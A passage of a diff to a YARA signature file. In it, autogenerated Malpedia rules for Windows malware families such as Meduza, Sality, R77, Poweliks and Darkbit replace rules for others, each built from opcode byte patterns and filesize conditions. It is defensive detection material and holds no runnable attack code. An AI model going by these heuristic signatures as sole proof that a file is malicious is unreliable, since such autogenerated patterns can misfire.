8b3f 8d44242c 50 53 68???????? 57 6a02 } - $sequence_3 = { c645fc02 8b08 52 53 50 ff5118 85c0 } - $sequence_4 = { eb05 be57000780 5f 8bc6 5e 5b c20400 } - $sequence_5 = { 85c0 7509 56 e8???????? 59 eba7 8d47ff } - $sequence_6 = { ff75e0 e8???????? 8b45f0 83c418 2b06 8bce c1f802 } - $sequence_7 = { 7430 ff7508 8bfe 33c0 ab ab ab } - $sequence_8 = { ff5024 85c0 0f8889040000 33c0 8dbd22fdffff 66898520fdffff ab } - $sequence_9 = { 8d8d54ffffff e8???????? 8bc6 e9???????? ff15???????? 50 8d8d28ffffff } + $sequence_0 = { ffc8 6641833c465c 7505 6641892c46 4c8bbc24e8000000 } + $sequence_1 = { 85c0 7553 488bcf ff15???????? 488d4c2430 } + $sequence_2 = { 488bd0 48d3ca 4933d0 4b8794fe90440200 eb2d } + $sequence_3 = { 48c7c102000080 897c2420 ff15???????? 85c0 740c 8bc8 ff15???????? } + $sequence_4 = { 488d1519de0000 488d0df2dd0000 e8???????? 488d1516de0000 488d0d07de0000 e8???????? 488b4308 } + $sequence_5 = { 4881c490000000 5d c3 4053 4883ec20 488bd9 } + $sequence_6 = { 660f28c1 4c8d0dfb9e0000 f20f101d???????? f20f100d???????? f20f59da } + $sequence_7 = { 85c0 0f8502010000 837c243c04 7516 } + $sequence_8 = { eb19 488d3d3a440100 eb10 488d3d41440100 eb07 488d3d20440100 4883a4248000000000 } + $sequence_9 = { 75ed 488bcb 85d2 7507 e8???????? eb08 498bd1 } condition: - 7 of them and filesize <1097728 + 7 of them and filesize <339968 } -rule MALPEDIA_Win_Miniasp_Auto : FILE +rule MALPEDIA_Win_Longwatch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a296e0dd-d471-5c91-a6b1-780906aaa535" + id = "9cbc3845-247e-5088-802c-974faf2556c3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miniasp_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.longwatch_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "9a4758ded83cb0970a2c1c85a01ff8f2f0263c333e1e2d45a290cc1db4a95dd4" + logic_hash = "f16a1609422dbff4c114599f67e44a3d80148789c090def0703b76643a40482b" score = 75 quality = 75 tags = "FILE" @@ -138258,32 +140975,32 @@ rule MALPEDIA_Win_Miniasp_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45c0 898550ffffff 8b8550ffffff 40 89854cffffff 8b8550ffffff } - $sequence_1 = { ff15???????? 85c0 751b c785c0fbffff10d84000 68???????? 8d85c0fbffff 50 } - $sequence_2 = { 8b4508 0345f0 0fbe4002 83f841 7c15 8b4508 } - $sequence_3 = { 747c 8b45f4 8945d8 8b45d8 40 8945d4 8b45d8 } - $sequence_4 = { 83a564ffffff00 eb0b 1bc0 83d8ff 898564ffffff } - $sequence_5 = { 6a00 ff75f8 e8???????? 83c40c 6804010000 6a00 } - $sequence_6 = { 68???????? 8d85c0fbffff 50 e8???????? b001 5f 5e } - $sequence_7 = { ff15???????? 85c0 7534 ff15???????? 3d882f0000 7427 ff75f8 } - $sequence_8 = { 0f8516010000 8b45ec 8b00 8b4dec ff5020 8945f4 837df400 } - $sequence_9 = { 8985ecfbffff 8b85ecfbffff 3b45fc 7728 6a01 68???????? 8b4508 } + $sequence_0 = { 68???????? e8???????? 83c404 833d????????ff 7546 6a00 } + $sequence_1 = { 8bec 53 8b5d08 33c9 57 33c0 8d3c9d2c074300 } + $sequence_2 = { 0f8cf8030000 68a1000000 ff15???????? 6683f888 0f8ce3030000 8d46fe } + $sequence_3 = { eb29 8b55d4 8a07 8b0c95a00b4300 } + $sequence_4 = { 53 8b5d08 33c9 57 33c0 8d3c9d2c074300 f00fb10f } + $sequence_5 = { 6bc618 57 8db874074300 57 } + $sequence_6 = { 8ad3 b9???????? e8???????? 837d9400 8db548ffffff } + $sequence_7 = { e8???????? ff7364 33c9 8d7b18 84c0 0f44f9 } + $sequence_8 = { 56 68a0000000 8bf1 ff15???????? } + $sequence_9 = { c74634d46e4200 6a00 57 8bce e8???????? } condition: - 7 of them and filesize <139264 + 7 of them and filesize <647168 } -rule MALPEDIA_Win_Taleret_Auto : FILE +rule MALPEDIA_Win_Poweliks_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "90652d3d-3308-5c4e-91b0-de6f7ec4ea56" + id = "14491e8d-2d96-5692-9946-38a18e40eb85" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taleret_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poweliks_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "0af9ed1f3725609b54a6e19f400c5abe16095e727614fae56d9f4e23ded04fd2" + logic_hash = "38ca9b6ecbf4df7389b1ea24aaf1d7d4d015a732f44c61342f6c9c25d4c2ea48" score = 75 quality = 75 tags = "FILE" @@ -138297,32 +141014,32 @@ rule MALPEDIA_Win_Taleret_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c68424b40300000d e8???????? 50 8d4b18 } - $sequence_1 = { 8b44240c 8b4c2408 8b542404 6a00 6a00 6a03 68???????? } - $sequence_2 = { 51 50 68???????? 890d???????? } - $sequence_3 = { 8d442408 c744242401000000 50 ff15???????? 85c0 7528 8b4c2438 } - $sequence_4 = { 8d4e3c c644241c05 e8???????? 8d4e40 c644241c06 e8???????? } - $sequence_5 = { c60600 e8???????? 83c40c 85c0 7526 57 8d8c24e8000000 } - $sequence_6 = { 85c0 0f85b2000000 a1???????? 668b0d???????? 8a15???????? 89842480000000 } - $sequence_7 = { c684247016000001 e8???????? 8b9c247c160000 8b6c241c e9???????? 8b442424 8b4c2414 } - $sequence_8 = { 8a440444 eb02 b03d 83fd01 884301 7e33 } - $sequence_9 = { e8???????? 83c408 33f6 e8???????? 8a96f0700010 32d0 } + $sequence_0 = { eb0b 8b5118 ebc9 8b5dec 8b75e8 8b45f8 8b0c87 } + $sequence_1 = { c745b4726f6341 c745b864647265 66c745bc7373 c645be00 8bc8 57 } + $sequence_2 = { 83ff0c 7439 3bc8 75ce 8b5508 } + $sequence_3 = { 8d5598 33ff 2bf2 8d147e 8a541598 32547d98 } + $sequence_4 = { 7415 8b7d08 8b720c 81c704110000 03f7 8b7a04 } + $sequence_5 = { 663b4b06 7333 8b4a08 8b32 3bce 7602 8bce } + $sequence_6 = { 33c9 663b4b06 7333 8b4a08 8b32 3bce 7602 } + $sequence_7 = { 57 0fb65dfe 81e307000080 7905 4b } + $sequence_8 = { 8b3486 8365fc00 03ca 894df4 8d45d0 03f2 2945f4 } + $sequence_9 = { 3a5c0db0 7506 40 83f80f } condition: - 7 of them and filesize <73728 + 7 of them and filesize <115712 } -rule MALPEDIA_Win_Thunderx_Auto : FILE +rule MALPEDIA_Win_R77_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bd791591-7f4e-54f3-bf78-0dd306ad53b2" + id = "79566c97-5b66-5f14-a1d3-bc9852e6d698" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thunderx_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.r77_auto.yar#L1-L154" license_url = "N/A" - logic_hash = "088c8f2e806c5cf8226a8db8f2cdc4a3ddd2da7bdf68b4f2265db3773cd1c842" + logic_hash = "76c887c6ccc22f9627519af58959f5ccdb37c325ffba24612ced9e4b32cde701" score = 75 quality = 75 tags = "FILE" @@ -138336,32 +141053,36 @@ rule MALPEDIA_Win_Thunderx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? c9 c3 c705????????58004200 b001 c3 } - $sequence_1 = { b9???????? e8???????? 0fb60d???????? 84c0 6a01 58 0f45c8 } - $sequence_2 = { 51 53 8b5d10 8bd1 56 57 8955fc } - $sequence_3 = { 8d8d9cfbffff e8???????? 8d8d84fbffff e8???????? 8d8d6cfbffff e8???????? } - $sequence_4 = { 6a02 8d44241c 895c2424 50 53 53 } - $sequence_5 = { e8???????? 84c0 7558 83c718 3b7da0 75ea 8d4de0 } - $sequence_6 = { 89459c 8945a0 e8???????? 84c0 0f858d000000 395f10 } - $sequence_7 = { 03d1 8b0c85701b4200 8a0433 43 88440a2e 8b4dd8 8b55b4 } - $sequence_8 = { 8932 897204 897208 5e 5d c20400 6a18 } - $sequence_9 = { 8d8dd0fdffff e8???????? 8d4dac c645fc06 } + $sequence_0 = { 740c 8b4f0c e8???????? 85c0 } + $sequence_1 = { 740b 8b0f e8???????? 85c0 } + $sequence_2 = { 33c9 4c8d05e3d40000 488d15e4d40000 e8???????? 4885c0 740f } + $sequence_3 = { 0f8517030000 488d0d58ad0100 ff15???????? 4885c0 7412 } + $sequence_4 = { 4c8d058bfb0000 488b45e0 48c1e820 85c0 755d 8b45e0 } + $sequence_5 = { 33d2 660f1344243c 33c9 e8???????? 59 } + $sequence_6 = { f7d8 1bc0 40 85c0 750b 46 3b37 } + $sequence_7 = { c1fa06 6bc838 8b0495f8a00110 f644082801 7422 8d4508 8975f8 } + $sequence_8 = { 745c ffc1 413bc8 72f1 4885ff } + $sequence_9 = { 660f58e0 660fc5c400 25f0070000 660f28a050680110 660f28b840640110 660f54f0 660f5cc6 } + $sequence_10 = { 7408 8b442430 8bc8 cd29 488d0df6980100 } + $sequence_11 = { 03f3 03c3 894508 833e00 7447 8b7df0 8b08 } + $sequence_12 = { 488b03 833800 7513 488d15e3a70000 488d0dbca70000 } + $sequence_13 = { 33c0 c3 56 e8???????? ff15???????? } condition: - 7 of them and filesize <319488 + 7 of them and filesize <350208 } -rule MALPEDIA_Win_Doorme_Auto : FILE +rule MALPEDIA_Win_Xpan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "86390d1e-5c43-5440-9d47-06677f2da02f" + id = "7325c725-fe3e-5c78-bad6-69f44695968e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doorme_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xpan_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "36db3801adbf1063a2540e3d2f2d2feff6537948c8fe3ef7123221f42e10e308" + logic_hash = "be7f9da8e0e3ad23e9493cdb12bfec902f58437483383423a4e4858dbe439d66" score = 75 quality = 75 tags = "FILE" @@ -138375,32 +141096,32 @@ rule MALPEDIA_Win_Doorme_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48837e1810 7203 488b16 4c8b4610 488d4d58 e8???????? 488d5558 } - $sequence_1 = { 75f6 488bd7 488d4d68 e8???????? 90 4c8d8d10010000 } - $sequence_2 = { 41b111 41b207 450fb6da b312 0fb6f9 40b618 4533e4 } - $sequence_3 = { 488b05???????? 4833c4 48894537 488bda 488bf9 4889552f c6459700 } - $sequence_4 = { 498b7810 4885ff 7566 48897a10 } - $sequence_5 = { 488d5c2478 48837d9010 480f435c2478 488d05a23f0300 488945a0 c74424400e000000 } - $sequence_6 = { 488b00 498bcd ff5020 48894580 498b4500 498bcd ff5018 } - $sequence_7 = { 75f1 4983e801 75db 4883c510 4c8d15f06b0300 48836c243001 0f8564feffff } - $sequence_8 = { 488d8d20030000 e8???????? 488b7d80 488b07 488bcf ff5050 } - $sequence_9 = { 4889442440 448bc2 48894c2420 488bd9 } + $sequence_0 = { 83c001 c7450cffffffff 894108 8b4108 3b410c 0f83cb050000 0fb600 } + $sequence_1 = { 8bb018010000 85f6 0f8557010000 8b01 89cd 83f84d 0f870d1d0000 } + $sequence_2 = { 8b5d20 83e001 05ffffff7f 8903 8b451c c70004000000 807dbc00 } + $sequence_3 = { 8b442428 895c2404 89442408 ff15???????? 39c3 7247 } + $sequence_4 = { ffd5 83ec04 83fe05 75ea 8d7338 c7431cffffffff } + $sequence_5 = { 8b55d0 c645c201 0fbed8 0fb65210 e9???????? c645c100 c645c201 } + $sequence_6 = { 8b930c010000 88442418 be01000000 c683ff00000000 c7442404ff000000 891c24 89542408 } + $sequence_7 = { 0fb644242c 89442404 89f0 83c002 890424 e8???????? e9???????? } + $sequence_8 = { e9???????? 8d489f 80f905 0f874b0e0000 83e857 e9???????? 8b931c010000 } + $sequence_9 = { 31c0 e9???????? 8b44241c 897c243c 89442438 8d442438 898310010000 } condition: - 7 of them and filesize <580608 + 7 of them and filesize <3235840 } -rule MALPEDIA_Win_Evilgrab_Auto : FILE +rule MALPEDIA_Win_Meduza_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92d56cb6-a40e-55a9-bb4b-7f3303d7e68c" + id = "e4f4d329-00f5-5eac-b6fa-1a17dabc236f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilgrab_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meduza_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "89c0b96a8a59594e704b0e35c7d209399933043505a45ecc6b5a8cd70ad1865a" + logic_hash = "5c31e3491e238f84a3f72990d6fa7fa5c8ed914b3efa6ee6f598848d375c51b9" score = 75 quality = 75 tags = "FILE" @@ -138414,34 +141135,34 @@ rule MALPEDIA_Win_Evilgrab_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 50 50 52 89442440 89442434 89442438 } - $sequence_1 = { 8dbdb8f5ffff f3a5 a4 b909000000 be???????? 8dbd5cf4ffff f3a5 } - $sequence_2 = { c3 8d45c4 50 6a03 68???????? 8b0e 81c1d2000000 } - $sequence_3 = { 8b9534aeffff 52 8bcb e8???????? 85c0 7531 6aa7 } - $sequence_4 = { 8b35???????? e9???????? 8b85c8adffff 898540a3ffff 50 e8???????? 8b85c0adffff } - $sequence_5 = { 6a00 85f6 6a00 7567 } - $sequence_6 = { 52 8b45d4 8b481c 51 e8???????? } - $sequence_7 = { 52 8b35???????? ffd6 d1e0 898565a4ffff } - $sequence_8 = { 52 68???????? 53 ffd5 83c410 6880000000 53 } - $sequence_9 = { 33c0 8dbdf0efffff f3ab c685f0efffffd0 668b5304 52 e8???????? } + $sequence_0 = { ff75c8 8d55ac c645fc01 8d8d78ffffff e8???????? 83c404 8d4d94 } + $sequence_1 = { c645fc23 c785f8eaffff02000000 c78548f8ffff3ebfeb85 c7854cf8ffff59dea06d 8b8548f8ffff 8b8d4cf8ffff 898d04f3ffff } + $sequence_2 = { 83c408 c645fc15 8b4590 3b4580 0f84e9020000 66660f1f840000000000 8d7020 } + $sequence_3 = { 8d45e0 c645fc02 50 e8???????? 8b4de4 83c404 8bf8 } + $sequence_4 = { 898538f4ffff 898d3cf4ffff c785d8f6ffffdf03fddd c785dcf6ffffe227d929 8b85d8f6ffff 8b8ddcf6ffff 898540f4ffff } + $sequence_5 = { 898de4feffff 8985e0feffff c78558ffffff0d5f1759 c7855cfffffff2314621 8b8558ffffff 8b8d5cffffff 898decfeffff } + $sequence_6 = { c78548f8ffff68297235 c7854cf8ffff9d412b44 8b8548f8ffff 8b8d4cf8ffff 898dbcf5ffff 8985b8f5ffff c78548f8ffff5fcb84e8 } + $sequence_7 = { 898ddce7ffff c785d8e4ffffdf03fddd c785dce4ffffe227d929 8b85d8e4ffff 8b8ddce4ffff 8985e0e7ffff } + $sequence_8 = { e9???????? 807b0c00 0f8485010000 6a02 68???????? ff5004 8b4314 } + $sequence_9 = { c7854cf8ffff9d412b44 8b8548f8ffff 8b8d4cf8ffff 0f288d90f4ffff 898dfcfbffff 8d8d90f4ffff 8985f8fbffff } condition: - 7 of them and filesize <327680 + 7 of them and filesize <1433600 } -rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE +rule MALPEDIA_Win_Sality_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4c9695e3-d96e-5f67-a0c2-424bcf596515" + id = "c4fe3bef-4213-5d7d-913a-2b05b77a4928" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_sphinx_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sality_auto.yar#L1-L213" license_url = "N/A" - logic_hash = "c474cca5e98993ccd970de7e5648248c620e9abab23dec872f161292bb6b1fb0" + logic_hash = "0193eaeac2f20f17789979ee8ced6eebd2afd20c9546863e594d136342d3a2ff" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -138453,40 +141174,48 @@ rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 } - $sequence_1 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? } - $sequence_2 = { 50 e8???????? 83c410 c74604ffffffff 897508 } - $sequence_3 = { 50 e8???????? 83c430 85c0 7e0c } - $sequence_4 = { 52 52 8b6c2444 55 50 e8???????? 8944245c } - $sequence_5 = { 50 e8???????? 84c0 745f 8d442414 } - $sequence_6 = { 50 e8???????? 83c420 48 } - $sequence_7 = { 50 e8???????? 83c418 68???????? 68???????? } - $sequence_8 = { 01fc eb98 035e14 8ade } - $sequence_9 = { 010c02 3bf7 0f85f0f50000 e9???????? } - $sequence_10 = { 003b c09bdbe23ea11c 695600663ec700 de07 } - $sequence_11 = { 0303 50 ff550c 8b3e } - $sequence_12 = { 010d???????? 60 5a 98 } - $sequence_13 = { 020a 42 1af6 af } - $sequence_14 = { 0162c9 cf 0c06 3c3e } - $sequence_15 = { 0008 d7 9f b2d3 } + $sequence_0 = { 0302 50 6878563412 e8???????? } + $sequence_1 = { 0255fc 8855ec 8b45ec 25ff000000 } + $sequence_2 = { 02040a 8845fc 8b4dfc 81e1ff000000 } + $sequence_3 = { 0302 50 6a00 e8???????? } + $sequence_4 = { 837da000 751b 8b551c 52 8b4514 50 8b4d10 } + $sequence_5 = { 02c8 884dec 8b55f0 83c201 } + $sequence_6 = { 0311 52 6878563412 e8???????? } + $sequence_7 = { 0302 8945fc 8b4d10 8b55fc } + $sequence_8 = { 52 50 ff9539154000 58 6a00 } + $sequence_9 = { 8b5678 0354240c 8b5a20 035c240c 33c0 8b3b } + $sequence_10 = { 240f 3c0a 1c69 2f 8803 43 } + $sequence_11 = { f3a6 61 7513 8bc2 83e804 8b00 } + $sequence_12 = { eb0c 58 e8???????? b801000000 c3 } + $sequence_13 = { 7461 8bc8 48 c6857b27400000 } + $sequence_14 = { 8b00 0344240c eb02 33c0 } + $sequence_15 = { ff95bc154000 85c0 7415 58 } + $sequence_16 = { 010d???????? 83c004 5f 5e } + $sequence_17 = { 0007 7307 c607ff 8ac1 } + $sequence_18 = { 031e ff7608 ff7604 e8???????? } + $sequence_19 = { 00fb fb 804880bc 280d???????? } + $sequence_20 = { 0306 50 8d5604 e8???????? } + $sequence_21 = { 0306 50 8b4e04 8d5608 } + $sequence_22 = { 0202 7466 0fb77202 8b7a04 } + $sequence_23 = { 014304 c3 53 56 } condition: - 7 of them and filesize <3268608 + 7 of them and filesize <1523712 } -rule MALPEDIA_Win_Astralocker_Auto : FILE +rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0d5879c8-ffd6-54eb-8701-3a0bd5bd2437" + id = "25f80772-0fe0-5361-8b46-20a23fa9313b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.astralocker_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.op_blockbuster_auto.yar#L1-L321" license_url = "N/A" - logic_hash = "04cf0865e55d3f7d37324f7ff4a5b3ef42183f756ec3ed69d17a248a6814ecfc" + logic_hash = "7067748769cd92b2df2df661ece0caacb6285e4ff10828657376fad1bbae3d46" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -138498,32 +141227,56 @@ rule MALPEDIA_Win_Astralocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5508 8b440a04 50 8b0c0a 51 e8???????? } - $sequence_1 = { 83c102 894dfc 837dfc0a 0f83dc000000 8b55fc 8b4508 } - $sequence_2 = { 6bc20a 8b4d08 33d2 33f6 891401 } - $sequence_3 = { 6bc20a 8b4d08 33d2 33f6 } - $sequence_4 = { 8b440a04 50 8b0c0a 51 e8???????? 83c408 8945ec } - $sequence_5 = { 894dfc 837dfc0a 0f83dc000000 8b55fc 8b4508 8b4cd004 } - $sequence_6 = { 8b4508 8b4cd004 51 8b14d0 52 e8???????? } - $sequence_7 = { 33c0 33f6 89040a 89740a04 } - $sequence_8 = { ba08000000 6bc20a 8b4d08 33d2 33f6 891401 89740104 } - $sequence_9 = { 33c0 33f6 89040a 89740a04 c745fc00000000 eb09 } + $sequence_0 = { 6a00 e8???????? 85c0 7407 83f802 } + $sequence_1 = { f3ab 66ab aa 5f 85f6 } + $sequence_2 = { ff15???????? 6808400000 6a40 ff15???????? } + $sequence_3 = { 56 57 683c400000 6a40 } + $sequence_4 = { e8???????? 6800400000 6a00 ff15???????? } + $sequence_5 = { c701???????? 8b497c 85c9 7407 51 } + $sequence_6 = { 8a08 80f920 7505 83c021 eb05 } + $sequence_7 = { 68???????? 56 ff15???????? 68???????? 56 a3???????? e8???????? } + $sequence_8 = { 56 50 8d45fc 6a04 50 } + $sequence_9 = { 7412 68???????? 50 e8???????? 59 a3???????? 59 } + $sequence_10 = { 3c70 7f04 0409 eb06 } + $sequence_11 = { 3c69 7c08 3c70 7f04 } + $sequence_12 = { 488b05???????? 4833c4 48898424d0030000 33c0 488be9 } + $sequence_13 = { c3 56 53 6a01 57 e8???????? } + $sequence_14 = { 56 6a00 ff15???????? 8bf8 85ff 7504 5f } + $sequence_15 = { 8bc6 5f 5e c3 33c0 6a00 } + $sequence_16 = { 33c0 ebac 498bcc ff15???????? 488d4d70 } + $sequence_17 = { ff15???????? 85f6 7404 85c0 } + $sequence_18 = { 57 e8???????? 56 e8???????? 83c414 b801000000 } + $sequence_19 = { 68???????? 56 e8???????? 56 e8???????? 83c438 } + $sequence_20 = { 0f84df010000 8b542444 488bcf 442bea 4585ed } + $sequence_21 = { ff15???????? 85c0 0f84e7010000 488d558c 488d8dd0020000 ff15???????? } + $sequence_22 = { c3 33c0 ebf8 53 33db 391d???????? 56 } + $sequence_23 = { a3???????? 5e c3 68???????? ff15???????? 85c0 } + $sequence_24 = { e8???????? 85c0 7429 488d542468 4c8bce 41b804000000 488bcf } + $sequence_25 = { 83fb01 7524 488d942490010000 4d8bc4 488bcd } + $sequence_26 = { 8b86d8974400 85c0 740e 50 e8???????? } + $sequence_27 = { 83e03f 6bc830 8b0495d8974400 f644082801 7421 57 e8???????? } + $sequence_28 = { c1fa06 8bc6 83e03f 6bc830 8b0495d8974400 885c0128 8b0495d8974400 } + $sequence_29 = { 81ec54080000 56 57 33f6 b9ff010000 33c0 8dbdaef7ffff } + $sequence_30 = { f3ab 8bca 83e103 f3aa 8b4df8 } + $sequence_31 = { 57 50 ff5114 85c0 0f8c8c000000 } + $sequence_32 = { ffd6 6a00 6a00 8d8424140c0000 6a00 } + $sequence_33 = { 58 7577 ff7508 8b7d08 } condition: - 7 of them and filesize <191488 + 7 of them and filesize <74309632 } -rule MALPEDIA_Win_Dtrack_Auto : FILE +rule MALPEDIA_Win_Darkbit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a233c383-e1c0-5a80-b962-04f71174b55f" + id = "58b27aad-7d48-54be-9cff-6269fdf4ce6e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dtrack_auto.yar#L1-L160" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkbit_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "da8244413760aff3fc60e26778e79f2591abffda2d0aa55a6f2fe1a5cc4b0aa3" + logic_hash = "06c0013c639973d9f2d79cd394915657a8e01f1fe7c56128c97a4b11c48d29ab" score = 75 quality = 75 tags = "FILE" @@ -138537,37 +141290,32 @@ rule MALPEDIA_Win_Dtrack_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } - $sequence_1 = { ff15???????? 8d85dcfdffff 50 6a01 } - $sequence_2 = { 8955f0 8b45f0 0fb68899010000 51 8b55f0 } - $sequence_3 = { 8d85ecfeffff 50 8d8dc8fdffff 51 8d95ccfdffff } - $sequence_4 = { 0345f4 8810 ebac e9???????? 8be5 } - $sequence_5 = { 52 8d8590f5ffff 50 ff15???????? c685a0f8ffff00 6803010000 6a00 } - $sequence_6 = { c685b8fbffff00 6803010000 6a00 8d8db9fbffff 51 e8???????? } - $sequence_7 = { 51 e8???????? 83c410 8b558c 52 } - $sequence_8 = { 8b8520f5ffff 8a4801 888d1ff5ffff 838520f5ffff01 } - $sequence_9 = { d1e9 894df8 8b5518 8955fc c745f000000000 eb09 } - $sequence_10 = { 8b45fc c1e808 8b4dfc c1e910 } - $sequence_11 = { c1e810 23c8 33d1 8855f7 8b4df8 c1e908 8b55fc } - $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc } - $sequence_13 = { 6867452301 8b4d10 51 8b55f4 52 } - $sequence_14 = { eb64 8b4d10 51 6a00 8b55f4 52 e8???????? } + $sequence_0 = { e8???????? 48898424f0140000 48899c2498020000 488b0d???????? 48898c2478100000 488d05c1742500 90 } + $sequence_1 = { eb23 4889c7 488b8c24d0180000 e8???????? 488d7810 488b8424c8180000 6690 } + $sequence_2 = { e8???????? 4889842410010000 48899c2418070000 488b442460 48c7c3feffffff e8???????? 4889842470010000 } + $sequence_3 = { eb11 488d7818 488b8c24f0110000 e8???????? 488b8c24e8030000 48894810 833d????????00 } + $sequence_4 = { 833d????????00 7515 488b8c24a81e0000 488908 488905???????? 90 eb1c } + $sequence_5 = { e8???????? 488b542440 48895008 833d????????00 750d 488b9424c0000000 488910 } + $sequence_6 = { e8???????? 4889842428080000 48899c2480110000 488b8424a0080000 48c7c3ffffffff 0f1f440000 e8???????? } + $sequence_7 = { e8???????? 488d8424d8000000 488b9c2408010000 90 e8???????? b801000000 eb21 } + $sequence_8 = { e8???????? 803d????????00 7431 488d1543fa1a00 488915???????? 833d????????00 7509 } + $sequence_9 = { ffd2 84c0 7556 488d0509aa3000 488b5c2430 488b4c2438 e8???????? } condition: - 7 of them and filesize <1736704 + 7 of them and filesize <11612160 } -rule MALPEDIA_Win_Akira_Auto : FILE +rule MALPEDIA_Win_Oski_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5047b686-dc46-5a3e-aa74-fc92a34b0f3e" + id = "e23300f3-24c2-58db-ad53-9ccc894ba178" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira" - source_url = 